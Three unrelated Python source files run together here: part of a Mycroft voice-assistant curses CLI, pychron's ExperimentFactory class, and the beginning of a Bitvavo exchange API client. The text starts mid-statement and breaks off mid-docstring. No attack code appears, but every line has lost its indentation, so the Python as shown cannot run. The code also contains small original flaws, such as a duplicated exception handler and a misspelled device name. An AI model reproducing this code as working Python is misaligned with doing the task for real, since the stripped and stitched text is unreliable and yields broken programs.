CLR_HEADING)
scr.addstr(curses.LINES - 1, 0, ">", CLR_HEADING)
_do_meter(cy_chat_area + 2)
scr.addstr(curses.LINES - 1, 2, ln[-(curses.COLS - 3):], CLR_INPUT)
# Curses doesn't actually update the display until refresh() is called
scr.refresh()
def make_titlebar(title, bar_length):
return title + " " + ("=" * (bar_length - 1 - len(title)))
##############################################################################
# Help system
help_struct = [
(
'Log Scrolling shortcuts',
[
("Up / Down / PgUp / PgDn", "scroll thru history"),
("Ctrl+T / Ctrl+PgUp", "scroll to top of logs (jump to oldest)"),
("Ctrl+B / Ctrl+PgDn", "scroll to bottom of logs" +
"(jump to newest)"),
("Left / Right", "scroll long lines left/right"),
("Home / End", "scroll to start/end of long lines")
]
),
(
"Query History shortcuts",
[
("Ctrl+N / Ctrl+Right", "previous query"),
("Ctrl+P / Ctrl+Left", "next query")
]
),
(
"General Commands (type ':' to enter command mode)",
[
(":quit or :exit", "exit the program"),
(":meter (show|hide)", "display the microphone level"),
(":keycode (show|hide)", "display typed key codes (mainly debugging)"),
(":history (# lines)", "set size of visible history buffer"),
(":clear", "flush the logs")
]
),
(
"Log Manipulation Commands",
[
(":filter 'STR'", "adds a log filter (optional quotes)"),
(":filter remove 'STR'", "removes a log filter"),
(":filter (clear|reset)", "reset filters"),
(":filter (show|list)", "display current filters"),
(":find 'STR'", "show logs containing 'str'"),
(":log level (DEBUG|INFO|ERROR)", "set logging level"),
(":log bus (on|off)", "control logging of messagebus messages")
]
),
(
"Skill Debugging Commands",
[
(":skills", "list installed skills"),
(":activate SKILL", "activate skill, e.g. 'activate skill-wiki'"),
(":deactivate SKILL", "deactivate skill"),
(":keep SKILL", "deactivate all skills except " +
"the indicated skill")
]
)
]
help_longest = 0
for s in help_struct:
for ent in s[1]:
help_longest = max(help_longest, len(ent[0]))
HEADER_SIZE = 2
HEADER_FOOTER_SIZE = 4
def num_help_pages():
lines = 0
for section in help_struct:
lines += 3 + len(section[1])
return ceil(lines / (curses.LINES - HEADER_FOOTER_SIZE))
def do_draw_help(scr):
def render_header():
scr.addstr(0, 0, center(25) + "Mycroft Command Line Help", CLR_HEADING)
scr.addstr(1, 0, "=" * (curses.COLS - 1), CLR_HEADING)
def render_help(txt, y_pos, i, first_line, last_line, clr):
if i >= first_line and i < last_line:
scr.addstr(y_pos, 0, txt, clr)
y_pos += 1
return y_pos
def render_footer(page, total):
text = "Page {} of {} [ Any key to continue ]".format(page, total)
scr.addstr(curses.LINES - 1, 0, center(len(text)) + text, CLR_HEADING)
scr.erase()
render_header()
y = HEADER_SIZE
page = subscreen + 1
# Find first and last taking into account the header and footer
first = subscreen * (curses.LINES - HEADER_FOOTER_SIZE)
last = first + (curses.LINES - HEADER_FOOTER_SIZE)
i = 0
for section in help_struct:
y = render_help(section[0], y, i, first, last, CLR_HEADING)
i += 1
y = render_help("=" * (curses.COLS - 1), y, i, first, last,
CLR_HEADING)
i += 1
for line in section[1]:
words = line[1].split()
ln = line[0].ljust(help_longest + 1)
for w in words:
if len(ln) + 1 + len(w) < curses.COLS:
ln += " "+w
else:
y = render_help(ln, y, i, first, last, CLR_CMDLINE)
ln = " ".ljust(help_longest + 2) + w
y = render_help(ln, y, i, first, last, CLR_CMDLINE)
i += 1
y = render_help(" ", y, i, first, last, CLR_CMDLINE)
i += 1
if i > last:
break
render_footer(page, num_help_pages())
# Curses doesn't actually update the display until refresh() is called
scr.refresh()
def show_help():
global screen_mode
global subscreen
if screen_mode != SCR_HELP:
screen_mode = SCR_HELP
subscreen = 0
set_screen_dirty()
def show_next_help():
global screen_mode
global subscreen
if screen_mode == SCR_HELP:
subscreen += 1
if subscreen >= num_help_pages():
screen_mode = SCR_MAIN
set_screen_dirty()
##############################################################################
# Skill debugging
def show_skills(skills):
"""
Show list of loaded skills in as many column as necessary
"""
global scr
global screen_mode
if not scr:
return
screen_mode = SCR_SKILLS
row = 2
column = 0
def prepare_page():
global scr
nonlocal row
nonlocal column
scr.erase()
scr.addstr(0, 0, center(25) + "Loaded skills", CLR_CMDLINE)
scr.addstr(1, 1, "=" * (curses.COLS - 2), CLR_CMDLINE)
row = 2
column = 0
prepare_page()
col_width = 0
skill_names = sorted(skills.keys())
for skill in skill_names:
if skills[skill]['active']:
color = curses.color_pair(4)
else:
color = curses.color_pair(2)
scr.addstr(row, column, " {}".format(skill), color)
row += 1
col_width = max(col_width, len(skill))
if row == curses.LINES - 2 and column > 0 and skill != skill_names[-1]:
column = 0
scr.addstr(curses.LINES - 1, 0,
center(23) + "Press any key to continue", CLR_HEADING)
scr.refresh()
scr.get_wch() # blocks
prepare_page()
elif row == curses.LINES - 2:
# Reached bottom of screen, start at top and move output to a
# New column
row = 2
column += col_width + 2
col_width = 0
if column > curses.COLS - 20:
# End of screen
break
scr.addstr(curses.LINES - 1, 0, center(23) + "Press any key to return",
CLR_HEADING)
scr.refresh()
def center(str_len):
# generate number of characters needed to center a string
# of the given length
return " " * ((curses.COLS - str_len) // 2)
##############################################################################
# Main UI lopo
def _get_cmd_param(cmd, keyword):
# Returns parameter to a command. Will de-quote.
# Ex: find 'abc def' returns: abc def
# find abc def returns: abc def
if isinstance(keyword, list):
for w in keyword:
cmd = cmd.replace(w, "").strip()
else:
cmd = cmd.replace(keyword, "").strip()
if not cmd:
return None
last_char = cmd[-1]
if last_char == '"' or last_char == "'":
parts = cmd.split(last_char)
return parts[-2]
else:
parts = cmd.split(" ")
return parts[-1]
def handle_cmd(cmd):
global show_meter
global screen_mode
global log_filters
global cy_chat_area
global find_str
global show_last_key
if "show" in cmd and "log" in cmd:
pass
elif "help" in cmd:
show_help()
elif "exit" in cmd or "quit" in cmd:
return 1
elif "keycode" in cmd:
# debugging keyboard
if "hide" in cmd or "off" in cmd:
show_last_key = False
elif "show" in cmd or "on" in cmd:
show_last_key = True
elif "meter" in cmd:
# microphone level meter
if "hide" in cmd or "off" in cmd:
show_meter = False
elif "show" in cmd or "on" in cmd:
show_meter = True
elif "find" in cmd:
find_str = _get_cmd_param(cmd, "find")
rebuild_filtered_log()
elif "filter" in cmd:
if "show" in cmd or "list" in cmd:
# display active filters
add_log_message("Filters: " + str(log_filters))
return
if "reset" in cmd or "clear" in cmd:
log_filters = list(default_log_filters)
else:
# extract last word(s)
param = _get_cmd_param(cmd, "filter")
if param:
if "remove" in cmd and param in log_filters:
log_filters.remove(param)
else:
log_filters.append(param)
rebuild_filtered_log()
add_log_message("Filters: " + str(log_filters))
elif "clear" in cmd:
clear_log()
elif "log" in cmd:
# Control logging behavior in all Mycroft processes
if "level" in cmd:
level = _get_cmd_param(cmd, ["log", "level"])
bus.emit(Message("mycroft.debug.log", data={'level': level}))
elif "bus" in cmd:
state = _get_cmd_param(cmd, ["log", "bus"]).lower()
if state in ["on", "true", "yes"]:
bus.emit(Message("mycroft.debug.log", data={'bus': True}))
elif state in ["off", "false", "no"]:
bus.emit(Message("mycroft.debug.log", data={'bus': False}))
elif "history" in cmd:
# extract last word(s)
lines = int(_get_cmd_param(cmd, "history"))
if not lines or lines < 1:
lines = 1
max_chat_area = curses.LINES - 7
if lines > max_chat_area:
lines = max_chat_area
cy_chat_area = lines
elif "skills" in cmd:
# List loaded skill
message = bus.wait_for_response(
Message('skillmanager.list'), reply_type='mycroft.skills.list')
if message:
show_skills(message.data)
scr.get_wch() # blocks
screen_mode = SCR_MAIN
set_screen_dirty()
elif "deactivate" in cmd:
skills = cmd.split()[1:]
if len(skills) > 0:
for s in skills:
bus.emit(Message("skillmanager.deactivate", data={'skill': s}))
else:
add_log_message('Usage :deactivate SKILL [SKILL2] [...]')
elif "keep" in cmd:
s = cmd.split()
if len(s) > 1:
bus.emit(Message("skillmanager.keep", data={'skill': s[1]}))
else:
add_log_message('Usage :keep SKILL')
elif "activate" in cmd:
skills = cmd.split()[1:]
if len(skills) > 0:
for s in skills:
bus.emit(Message("skillmanager.activate", data={'skill': s}))
else:
add_log_message('Usage :activate SKILL [SKILL2] [...]')
# TODO: More commands
return 0 # do nothing upon return
def handle_is_connected(msg):
add_log_message("Connected to Messagebus!")
# start_qml_gui(bus, gui_text)
def handle_reconnecting():
add_log_message("Looking for Messagebus websocket...")
def gui_main(stdscr):
global scr
global bus
global line
global log_line_lr_scroll
global longest_visible_line
global find_str
global last_key
global history
global screen_lock
global show_gui
global config
scr = stdscr
init_screen()
scr.keypad(1)
scr.notimeout(True)
bus.on('speak', handle_speak)
bus.on('message', handle_message)
bus.on('recognizer_loop:utterance', handle_utterance)
bus.on('connected', handle_is_connected)
bus.on('reconnecting', handle_reconnecting)
add_log_message("Establishing Mycroft Messagebus connection...")
gui_thread = ScreenDrawThread()
gui_thread.setDaemon(True) # this thread won't prevent prog from exiting
gui_thread.start()
hist_idx = -1 # index, from the bottom
c = 0
try:
while True:
set_screen_dirty()
c = 0
code = 0
try:
if ctrl_c_pressed():
# User hit Ctrl+C. treat same as Ctrl+X
c = 24
else:
# Don't block, this allows us to refresh the screen while
# waiting on initial messagebus connection, etc
scr.timeout(1)
c = scr.get_wch() # unicode char or int for special keys
if c == -1:
continue
except curses.error:
# This happens in odd cases, such as when you Ctrl+Z
# the CLI and then resume. Curses fails on get_wch().
continue
if isinstance(c, int):
code = c
else:
code = ord(c)
# Convert VT100 ESC codes generated by some terminals
if code == 27:
# NOTE: Not sure exactly why, but the screen can get corrupted
# if we draw to the screen while doing a scr.getch(). So
# lock screen updates until the VT100 sequence has been
# completely read.
with screen_lock:
scr.timeout(0)
c1 = -1
start = time.time()
while c1 == -1:
c1 = scr.getch()
if time.time()-start > 1:
break # 1 second timeout waiting for ESC code
c2 = -1
while c2 == -1:
c2 = scr.getch()
if time.time()-start > 1: # 1 second timeout
break # 1 second timeout waiting for ESC code
if c1 == 79 and c2 == 120:
c = curses.KEY_UP
elif c1 == 79 and c2 == 116:
c = curses.KEY_LEFT
elif c1 == 79 and c2 == 114:
c = curses.KEY_DOWN
elif c1 == 79 and c2 == 118:
c = curses.KEY_RIGHT
elif c1 == 79 and c2 == 121:
c = curses.KEY_PPAGE # aka PgUp
elif c1 == 79 and c2 == 115:
c = curses.KEY_NPAGE # aka PgDn
elif c1 == 79 and c2 == 119:
c = curses.KEY_HOME
elif c1 == 79 and c2 == 113:
c = curses.KEY_END
else:
c = c1
if c1 != -1:
last_key = str(c) + ",ESC+" + str(c1) + "+" + str(c2)
code = c
else:
last_key = "ESC"
else:
if code < 33:
last_key = str(code)
else:
last_key = str(code)
scr.timeout(-1) # resume blocking
if code == 27: # Hitting ESC twice clears the entry line
hist_idx = -1
line = ""
elif c == curses.KEY_RESIZE:
# Generated by Curses when window/screen has been resized
y, x = scr.getmaxyx()
curses.resizeterm(y, x)
# resizeterm() causes another curses.KEY_RESIZE, so
# we need to capture that to prevent a loop of resizes
c = scr.get_wch()
elif screen_mode == SCR_HELP:
# in Help mode, any key goes to next page
show_next_help()
continue
elif c == '\n' or code == 10 or code == 13 or code == 343:
# ENTER sends the typed line to be processed by Mycroft
if line == "":
continue
if line[:1] == ":":
# Lines typed like ":help" are 'commands'
if handle_cmd(line[1:]) == 1:
break
else:
# Treat this as an utterance
bus.emit(Message("recognizer_loop:utterance",
{'utterances': [line.strip()],
'lang': config.get('lang', 'en-us')}))
hist_idx = -1
line = ""
elif code == 16 or code == 545: # Ctrl+P or Ctrl+Left (Previous)
# Move up the history stack
hist_idx = clamp(hist_idx + 1, -1, len(history) - 1)
if hist_idx >= 0:
line = history[len(history) - hist_idx - 1]
else:
line = ""
elif code == 14 or code == 560: # Ctrl+N or Ctrl+Right (Next)
# Move down the history stack
hist_idx = clamp(hist_idx - 1, -1, len(history) - 1)
if hist_idx >= 0:
line = history[len(history) - hist_idx - 1]
else:
line = ""
elif c == curses.KEY_LEFT:
# scroll long log lines left
log_line_lr_scroll += curses.COLS // 4
elif c == curses.KEY_RIGHT:
# scroll long log lines right
log_line_lr_scroll -= curses.COLS // 4
if log_line_lr_scroll < 0:
log_line_lr_scroll = 0
elif c == curses.KEY_HOME:
# HOME scrolls log lines all the way to the start
log_line_lr_scroll = longest_visible_line
elif c == curses.KEY_END:
# END scrolls log lines all the way to the end
log_line_lr_scroll = 0
elif c == curses.KEY_UP:
scroll_log(False, 1)
elif c == curses.KEY_DOWN:
scroll_log(True, 1)
elif c == curses.KEY_NPAGE: # aka PgDn
# PgDn to go down a page in the logs
scroll_log(True)
elif c == curses.KEY_PPAGE: # aka PgUp
# PgUp to go up a page in the logs
scroll_log(False)
elif code == 2 or code == 550: # Ctrl+B or Ctrl+PgDn
scroll_log(True, max_log_lines)
elif code == 20 or code == 555: # Ctrl+T or Ctrl+PgUp
scroll_log(False, max_log_lines)
elif code == curses.KEY_BACKSPACE or code == 127:
# Backspace to erase a character in the utterance
line = line[:-1]
elif code == 6: # Ctrl+F (Find)
line = ":find "
elif code == 7: # Ctrl+G (start GUI)
if show_gui is None:
start_qml_gui(bus, gui_text)
show_gui = not show_gui
elif code == 18: # Ctrl+R (Redraw)
scr.erase()
elif code == 24: # Ctrl+X (Exit)
if find_str:
# End the find session
find_str = None
rebuild_filtered_log()
elif line.startswith(":"):
# cancel command mode
line = ""
else:
# exit CLI
break
elif code > 31 and isinstance(c, str):
# Accept typed character in the utterance
line += c
finally:
scr.erase()
scr.refresh()
scr = None
def simple_cli():
global bSimple
bSimple = True
bus.on('speak', handle_speak)
try:
while True:
# Sleep for a while so all the output that results
# from the previous command finishes before we print.
time.sleep(1.5)
print("Input (Ctrl+C to quit):")
line = sys.stdin.readline()
bus.emit(Message("recognizer_loop:utterance",
{'utterances': [line.strip()]}))
except KeyboardInterrupt as e:
# User hit Ctrl+C to quit
print("")
except KeyboardInterrupt as e:
LOG.exception(e)
event_thread.exit()
sys.exit()
def connect_to_messagebus():
""" Connect to the mycroft messagebus and launch a thread handling the
connection.
Returns: WebsocketClient
"""
bus = WebsocketClient() # Mycroft messagebus connection
event_thread = Thread(target=connect, args=[bus])
event_thread.setDaemon(True)
event_thread.start()
return bus
|
factory.py
|
# ===============================================================================
# Copyright 2012 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# ============= enthought library imports =======================
from __future__ import absolute_import
from __future__ import print_function
from pyface.timer.do_later import do_later
from traits.api import Instance, Button, Bool, Property, \
DelegatesTo, List, Str
# ============= standard library imports ========================
# ============= local library imports ==========================
from pychron.dvc.dvc_irradiationable import DVCAble
from pychron.experiment.auto_gen_config import AutoGenConfig
from pychron.experiment.automated_run.factory import AutomatedRunFactory
from pychron.experiment.automated_run.uv.factory import UVAutomatedRunFactory
from pychron.experiment.queue.experiment_queue import ExperimentQueue
from pychron.experiment.queue.factory import ExperimentQueueFactory
from pychron.experiment.undoer import ExperimentUndoer
from pychron.experiment.utilities.identifier import convert_extract_device
from pychron.lasers.laser_managers.ilaser_manager import ILaserManager
from pychron.pychron_constants import LINE_STR
class ExperimentFactory(DVCAble): #, ConsumerMixin):
run_factory = Instance(AutomatedRunFactory)
queue_factory = Instance(ExperimentQueueFactory)
undoer = Instance(ExperimentUndoer)
generate_queue_button = Button
edit_queue_config_button = Button
auto_gen_config = Instance(AutoGenConfig)
add_button = Button('Add')
clear_button = Button('Clear')
save_button = Button('Save')
edit_mode_button = Button('Edit')
edit_enabled = DelegatesTo('run_factory')
auto_increment_id = Bool(False)
auto_increment_position = Bool(False)
queue = Instance(ExperimentQueue, ())
ok_add = Property(depends_on='mass_spectrometer, extract_device, labnumber, username, load_name')
labnumber = DelegatesTo('run_factory')
load_name = DelegatesTo('queue_factory')
username = DelegatesTo('queue_factory')
mass_spectrometer = DelegatesTo('queue_factory')
extract_device = DelegatesTo('queue_factory')
selected_positions = List
default_mass_spectrometer = Str
_load_persistence_flag = False
# ===========================================================================
# permisions
# ===========================================================================
# max_allowable_runs = Int(10000)
# can_edit_scripts = Bool(True)
def __init__(self, *args, **kw):
super(ExperimentFactory, self).__init__(auto_setup=False, *args, **kw)
# self.setup_consumer(self._add_run, main=True)
pass
def undo(self):
self.info('undo')
self.undoer.undo()
def sync_queue_meta(self):
self.debug('syncing queue meta')
eq = self.queue
qf = self.queue_factory
for a in ('username', 'mass_spectrometer', 'extract_device',
'email', 'use_email',
'use_group_email',
'load_name', 'tray',
'delay_after_blank',
'delay_between_analyses',
'delay_after_air',
'queue_conditionals_name', 'note'):
if not self._sync_queue_to_factory(eq, qf, a):
self._sync_factory_to_queue(eq, qf, a)
self.debug('run factory set mass spec {}'.format(self.mass_spectrometer))
self.run_factory.set_mass_spectrometer(self.mass_spectrometer)
def _sync_queue_to_factory(self, eq, qf, a):
v = getattr(eq, a)
if isinstance(v, str):
v = v.strip()
if v:
self.debug('sync queue to factory {}>>{}'.format(a, v))
setattr(qf, a, v)
return True
def _sync_factory_to_queue(self, eq, qf, a):
v = getattr(qf, a)
if isinstance(v, str):
v = v.strip()
if v:
self.debug('sync factory to queue {}>>{}'.format(a, v))
setattr(eq, a, v)
def activate(self, load_persistence=True):
# self.start_consuming()
self._load_persistence_flag = load_persistence
self.queue_factory.activate(load_persistence)
self.run_factory.activate(load_persistence)
def destroy(self):
# self.stop_consuming()
self.run_factory.deactivate()
self.queue_factory.deactivate()
def set_selected_runs(self, runs):
self.run_factory.set_selected_runs(runs)
'''
uflag = bool(self.username)
msflag = self.mass_spectrometer not in ('', 'Spectrometer', LINE_STR)
lflag = True
if self.extract_device not in ('', 'Extract Device', LINE_STR):
lflag = bool(self.queue_factory.load_name)
ret = uflag and msflag and lflag
if self.run_factory.run_block in ('RunBlock', LINE_STR):
ret = ret and self.labnumber
return ret
'''
def _add_run(self, *args, **kw):
if not self.ok_add:
missing = []
if not bool(self.username):
missing.append('"Username"')
if self.mass_spectrometer in ('', 'Spectrometer', LINE_STR):
missing.append('"Spectrometer"')
if self.extract_device not in ('', 'Extact Device', LINE_STR):
if not bool(self.queue_factory.load_name):
missing.append('"Load"')
if self.run_factory.run_block in ('RunBlock', LINE_STR):
if not self.labnumber:
missing.append('"Labnumber"')
f = 'a value'
if len(missing) > 1:
f = 'values'
self.warning_dialog('Please set {} for {}'.format(f, ','.join(missing)))
return
positions = [str(pi.positions[0]) for pi in self.selected_positions]
self.debug('add run positions= {}'.format(positions))
# load_name = self.queue_factory.load_name
q = self.queue
rf = self.run_factory
new_runs, freq = rf.new_runs(q, positions=positions,
auto_increment_position=self.auto_increment_position,
auto_increment_id=self.auto_increment_id)
if new_runs:
aruns = q.automated_runs
if q.selected and q.selected[-1] in aruns:
idx = aruns.index(q.selected[-1])
else:
idx = len(aruns) - 1
runs = q.add_runs(new_runs, freq,
# freq_before=rf.freq_before,
# freq_after=rf.freq_after,
is_run_block=rf.run_block_enabled)
self.undoer.push('add runs', runs)
idx += len(runs)
with rf.update_selected_ctx():
q.select_run_idx(idx)
q.changed = True
# ===============================================================================
# handlers
# ===============================================================================
def _clear_button_fired(self):
self.queue.clear_frequency_runs()
def _add_button_fired(self):
"""
only allow add button to be fired every 0.5s
use consumermixin.add_consumable instead of frequency limiting
"""
self.debug('add run fired')
# self.add_consumable(5)
do_later(self._add_run)
def _edit_mode_button_fired(self):
self.run_factory.edit_mode = not self.run_factory.edit_mode
# @on_trait_change('run_factory:clear_end_after')
# def _clear_end_after(self, new):
# print 'enadfas', new
def _update_end_after(self, new):
if new:
for ai in self.queue.automated_runs:
ai.end_after = False
self.run_factory.set_end_after(new)
def _queue_changed(self, new):
self.undoer.queue = new
# @on_trait_change('''queue_factory:[mass_spectrometer,
# extract_device, delay_+, tray, username, load_name,
# email, use_email, use_group_email,
# queue_conditionals_name, repository_identifier]''')
def _update_queue(self, name, new):
self.debug('update queue {}={}'.format(name, new))
if self.queue:
self.queue.trait_set(**{name: new})
self.queue.changed = True
if name == 'repository_identifier':
for a in self.queue.automated_runs:
a.repository_identifier = new
if name == 'mass_spectrometer':
self.debug('_update_queue "{}"'.format(new))
self.mass_spectrometer = new
self.run_factory.set_mass_spectrometer(new)
elif name == 'extract_device':
self._set_extract_device(new)
# do_later(self._set_extract_device, new)
# elif name == 'username':
# self._username = new
# elif name=='email':
# self.email=new
# self.queue.username = new
self._auto_save()
def _auto_save(self):
self.queue.auto_save()
def get_patterns(self):
return self._get_patterns(self.extract_device)
# ===============================================================================
# private
# ===============================================================================
def _set_extract_device(self, ed):
self.debug('setting extract dev="{}" mass spec="{}"'.format(ed, self.mass_spectrometer))
self.run_factory = self._run_factory_factory()
self.run_factory.remote_patterns = patterns = self._get_patterns(ed)
self.run_factory.setup_files()
# self.run_factory.set_mass_spectrometer(self.mass_spectrometer)
if self._load_persistence_flag:
self.run_factory.load()
if self.queue:
self.queue.set_extract_device(ed)
self.queue.username = self.username
self.queue.mass_spectrometer = self.mass_spectrometer
self.queue.patterns = patterns
def _get_patterns(self, ed):
ps = []
service_name = convert_extract_device(ed)
# service_name = ed.replace(' ', '_').lower()
man = self.application.get_service(ILaserManager, 'name=="{}"'.format(service_name))
if man:
ps = man.get_pattern_names()
else:
self.debug('No remote patterns. {} ({}) not available'.format(ed, service_name))
return ps
# ===============================================================================
# property get/set
# ===============================================================================
def _get_ok_add(self):
"""
"""
uflag = bool(self.username)
msflag = self.mass_spectrometer not in ('', 'Spectrometer', LINE_STR)
lflag = True
if self.extract_device not in ('', 'Extract Device', LINE_STR):
lflag = bool(self.queue_factory.load_name)
ret = uflag and msflag and lflag
if self.run_factory.run_block in ('RunBlock', LINE_STR):
ret = ret and self.labnumber
return ret
# ===============================================================================
#
# ===============================================================================
def _run_factory_factory(self):
if self.extract_device == 'Fusions UV':
klass = UVAutomatedRunFactory
else:
klass = AutomatedRunFactory
rf = klass(dvc=self.dvc,
application=self.application,
extract_device=self.extract_device,
mass_spectrometer=self.mass_spectrometer)
# rf.activate()
# rf.on_trait_change(lambda x: self.trait_set(_labnumber=x), 'labnumber')
rf.on_trait_change(self._update_end_after, 'end_after')
rf.on_trait_change(self._auto_save, 'auto_save_needed')
print('making new factory', id(rf))
return rf
# handlers
# def _generate_runs_from_load(self, ):
# def gen():
# dvc = self.dvc
# load_name = self.load_name
# with dvc.session_ctx():
# dbload = dvc.get_loadtable(load_name)
# for poss in dbload.loaded_positions:
# # print poss
# ln_id = poss.lab_identifier
# dbln = dvc.get_labnumber(ln_id, key='id')
#
# yield dbln.identifier, dbln.sample.name, str(poss.position)
#
# return gen
def _edit_queue_config_button_fired(self):
self.auto_gen_config.run_blocks = self.run_factory.run_blocks
self.auto_gen_config.load()
info = self.auto_gen_config.edit_traits()
if info.result:
self.auto_gen_config.dump()
# def _generate_queue_button_fired(self):
# pd = myProgressDialog()
# pd.open()
#
# ans = list(self._generate_runs_from_load()())
# self._gen_func(pd, ans)
# # t=Thread(target=self._gen_func, args=(pd, ans))
# # t.start()
def _gen_func(self, pd, ans):
import time
pd.max = 100
self.debug('$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ generate queue')
auto_gen_config = self.auto_gen_config
# gen = self._generate_runs_from_load()
q = self.queue
rf = self.run_factory
rf.suppress_meta = True
def add_special(ln):
# tt = time.time()
pd.change_message('Add special: {}'.format(ln))
rf.special_labnumber = ln
new_runs, _ = rf.new_runs(q)
q.add_runs(new_runs, 0)
# rf.special_labnumber = ''
# print 'add special {}, {}'.format(ln, time.time()-tt)
st = time.time()
rb = auto_gen_config.end_run_block
if rb and rb in rf.run_blocks:
rf.run_block = auto_gen_config.end_run_block
new_runs, _ = rf.new_runs(q)
q.add_runs(new_runs, 0, is_run_block=False)
for ln, tag in (('Air', 'air'),
('Cocktail', 'cocktail'),
('Blank Unknown', 'blank')):
if getattr(auto_gen_config, 'start_{}'.format(tag)):
add_special(ln)
# for i, (labnumber, sample, position) in enumerate(gen()):
for i, (labnumber, sample, position) in enumerate(ans):
if i:
for ln, tag in (('Blank Unknown', 'blank'),
('Air', 'air'),
('Cocktail', 'cocktail')):
f = getattr(auto_gen_config, '{}_freq'.format(tag))
if f and i % f == 0:
add_special(ln)
pd.change_message('Adding {}. Position: {}'.format(labnumber, position))
# tt = time.time()
rf.labnumber = labnumber
rf.sample = sample
# print 'set ln/sample {} {}'.format(labnumber, time.time()-tt)
new_runs, _ = rf.new_runs(q, positions=position)
# print 'new runs {} {}'.format(labnumber, time.time()-tt)
q.add_runs(new_runs, 0, is_run_block=False)
# print 'add runs {} {}'.format(labnumber, time.time()-tt)
for ln, tag in (('Blank Unknown', 'blank'),
('Air', 'air'),
('Cocktail', 'cocktail')):
if getattr(auto_gen_config, 'end_{}'.format(tag)):
add_special(ln)
rb = auto_gen_config.end_run_block
if rb and rb in rf.run_blocks:
rf.run_block = auto_gen_config.end_run_block
new_runs, _ = rf.new_runs(q)
q.add_runs(new_runs, 0, is_run_block=False)
# print 'finished adding', time.time()-st
q.changed = True
rf.update_info_needed = True
rf.suppress_meta = False
print('totaltime', time.time() - st)
pd.close()
rf.labnumber = ''
rf.sample = ''
def _dvc_changed(self):
self.queue_factory.dvc = self.dvc
self.run_factory.dvc = self.dvc
def _application_changed(self):
self.run_factory.application = self.application
self.queue_factory.application = self.application
def _default_mass_spectrometer_changed(self):
self.debug('default mass spec changed "{}"'.format(self.default_mass_spectrometer))
self.run_factory.set_mass_spectrometer(self.default_mass_spectrometer)
self.queue_factory.mass_spectrometer = self.default_mass_spectrometer
self.mass_spectrometer = self.default_mass_spectrometer
# ===============================================================================
# defaults
# ===============================================================================
def _auto_gen_config_default(self):
ag = AutoGenConfig()
ag.load()
return ag
def _undoer_default(self):
return ExperimentUndoer(run_factory=self.run_factory,
queue=self.queue)
def _run_factory_default(self):
return self._run_factory_factory()
def _queue_factory_default(self):
eq = ExperimentQueueFactory(dvc=self.dvc,
application=self.application)
eq.on_trait_change(self._update_queue, '''mass_spectrometer,
extract_device, delay_+, tray, username, load_name, note,
email, use_email, use_group_email,
queue_conditionals_name, repository_identifier''')
# eq.activate()
return eq
# ============= EOF =============================================
|
bitvavo.py
|
import hashlib
import hmac
import json
import time
import datetime as dt
from threading import Thread
from typing import Any, Callable, Dict, List, Union
import websocket as ws_lib
from requests import delete, get, post, put
from structlog.stdlib import get_logger
from websocket import WebSocketApp # missing stubs for WebSocketApp
from bitvavo_api_upgraded.helper_funcs import configure_loggers, time_ms, time_to_wait
from bitvavo_api_upgraded.settings import BITVAVO_API_UPGRADED
from bitvavo_api_upgraded.type_aliases import anydict, errordict, intdict, ms, s_f, strdict
configure_loggers()
logger = get_logger(__name__)
def createSignature(timestamp: ms, method: str, url: str, body: anydict, APISECRET: str) -> str:
string = f"{timestamp}{method}/v2{url}"
if len(body.keys()) != 0:
string += json.dumps(body, separators=(",", ":"))
signature = hmac.new(APISECRET.encode("utf-8"), string.encode("utf-8"), hashlib.sha256).hexdigest()
return signature
def createPostfix(options: anydict) -> str:
"""Generate a URL postfix, based on the `options` dict.
---
Args:
options (anydict): [description]
---
Returns:
str: [description]
"""
params = [f"{key}={options[key]}" for key in options]
postfix = "&".join(params) # intersperse
return f"?{postfix}" if len(options) > 0 else postfix
def asksCompare(a: float, b: float) -> bool:
return a < b
def bidsCompare(a: float, b: float) -> bool:
return a > b
def sortAndInsert(
asks_or_bids: List[List[str]],
update: List[List[str]],
compareFunc: Callable[[float, float], bool],
) -> Union[List[List[str]], errordict]:
for updateEntry in update:
entrySet: bool = False
for j in range(len(asks_or_bids)):
bookItem = asks_or_bids[j]
if compareFunc(float(updateEntry[0]), float(bookItem[0])):
asks_or_bids.insert(j, updateEntry)
entrySet = True
break
if float(updateEntry[0]) == float(bookItem[0]):
if float(updateEntry[1]) > 0.0:
asks_or_bids[j] = updateEntry
entrySet = True
break
else:
asks_or_bids.pop(j)
entrySet = True
break
if not entrySet:
asks_or_bids.append(updateEntry)
return asks_or_bids
def processLocalBook(ws: "Bitvavo.WebSocketAppFacade", message: anydict) -> None:
market: str = ""
if "action" in message:
if message["action"] == "getBook":
market = message["response"]["market"]
ws.localBook[market]["bids"] = message["response"]["bids"]
ws.localBook[market]["asks"] = message["response"]["asks"]
ws.localBook[market]["nonce"] = message["response"]["nonce"]
ws.localBook[market]["market"] = market
elif "event" in message:
if message["event"] == "book":
market = message["market"]
if message["nonce"] != ws.localBook[market]["nonce"] + 1:
# I think I've fixed this, by looking at the other Bitvavo repos (search for 'nonce' or '!=' 😆)
ws.subscriptionBook(market, ws.callbacks[market])
return
ws.localBook[market]["bids"] = sortAndInsert(ws.localBook[market]["bids"], message["bids"], bidsCompare)
ws.localBook[market]["asks"] = sortAndInsert(ws.localBook[market]["asks"], message["asks"], asksCompare)
ws.localBook[market]["nonce"] = message["nonce"]
if market != "":
ws.callbacks["subscriptionBookUser"][market](ws.localBook[market])
class ReceiveThread(Thread):
def __init__(self, ws: WebSocketApp, ws_facade: "Bitvavo.WebSocketAppFacade"):
self.ws = ws
self.ws_facade = ws_facade
Thread.__init__(self)
def run(self) -> None:
try:
while self.ws_facade.keepAlive:
self.ws.run_forever()
self.ws_facade.reconnect = True
self.ws_facade.authenticated = False
time.sleep(self.ws_facade.reconnectTimer)
if self.ws_facade.bitvavo.debugging:
logger.debug(
f"we have just set reconnect to true and have waited for {self.ws_facade.reconnectTimer}",
)
self.ws_facade.reconnectTimer = self.ws_facade.reconnectTimer * 2
except KeyboardInterrupt:
if self.ws_facade.bitvavo.debugging:
logger.debug("keyboard-interrupt")
def stop(self) -> None:
self.ws_facade.keepAlive = False
def callback_example(response: Any) -> None:
"""
You can use this example as a starting point, for the websocket code, IF you want to
